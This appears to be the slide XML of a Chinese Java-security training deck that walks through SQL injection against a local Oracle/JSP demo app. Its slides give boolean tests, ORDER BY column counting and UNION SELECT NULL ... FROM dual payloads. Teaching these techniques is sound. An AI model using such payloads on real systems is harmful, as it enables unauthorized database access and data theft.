              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle Database，又名Oracle RDBMS，或简称Oracle。是甲骨</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文公司的一款关系数据库管理系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle对于MYSQL、MSSQL来说意味着更大的数据量，更大的权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>限。这一次我们依旧使用上面的代码，数据库结构平移到Oracle上</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>去，数据库名用的默认的orcl，字段"corps_desc" 从text改成了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VARCHAR2(4000)，JSP内的驱动和URL改成了对应的Oracle。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 开始怼（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）它（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Union +order by 永远都是最快捷最实用的，而盲注什么的太费</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时费力了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分别提交http://localhost/SqlInjection/index.jsp?id=1 AND </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1=1 和?id=1 AND 1=12 得到的页面明显不一致，1=12页面没</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有任何数据，即1=12为false没查询到任何结果。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527175" y="1027430"/>
            <a:ext cx="6089015" cy="292798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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 开始怼（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）它（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://localhost/SqlInjection/index.jsp?id=1 AND 1=12</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1929765"/>
            <a:ext cx="5775960" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 开始怼（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）它（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提交：http://localhost/SqlInjection/index.jsp?id=1 ORDER BY </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4-- 页面正常，</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提交：?id=1 ORDER BY 5--报错说明字段数肯定是4。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Order by 5爆出的错误信息： </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="3465830"/>
            <a:ext cx="7244080" cy="1052830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用union 进行联合查询：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle的dual表：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dual是一个虚拟表，用来构成select的语法规则，oracle保证dual</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>里面永远只有一条记录，在Oracle注入中用途可谓广泛。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle union 查询 tips:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle 在使用union 查询的跟Mysql不一样Mysql里面我用</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1,2,3,4就能占位，而在Oracle里面有比较严格的类型要求。也就</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是说你union select的要和前面的 </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT * from "corps" where "id" = 1 </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用union 进行联合查询：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当中查询的字段类型一致。我们已知查询的第二个字段是</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>corps_name，对应的数据类型是：VARCHAR2(100)，也就是字</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>符型。当我们传入整型的数字时就会报错。比如当我们提交union</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询时提交如下SQL注入语句：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT 1,2,NULL,NULL FROM dual--</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081405" y="1104900"/>
            <a:ext cx="6981190" cy="293306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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JavaEE 基础</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件目录：C:\apache-tomcat-7.0.34\work\Catalina\localhost\你的项目名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>\org\apache\jsp</a:t>
            </a:r>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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打开index_jsp.java或者用jd-gui（Java反编译工具）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1330325"/>
            <a:ext cx="6076315" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5607050" y="3082925"/>
            <a:ext cx="3171190" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用union 进行联合查询：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle当中正确的注入方式用NULL去占位在我们未知哪个字段是</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么类型的时候：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT NULL,NULL,NULL,NULL FROM dual--</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当已知第一个字段是整型的时候：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT 1,NULL,NULL,NULL FROM dual--</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
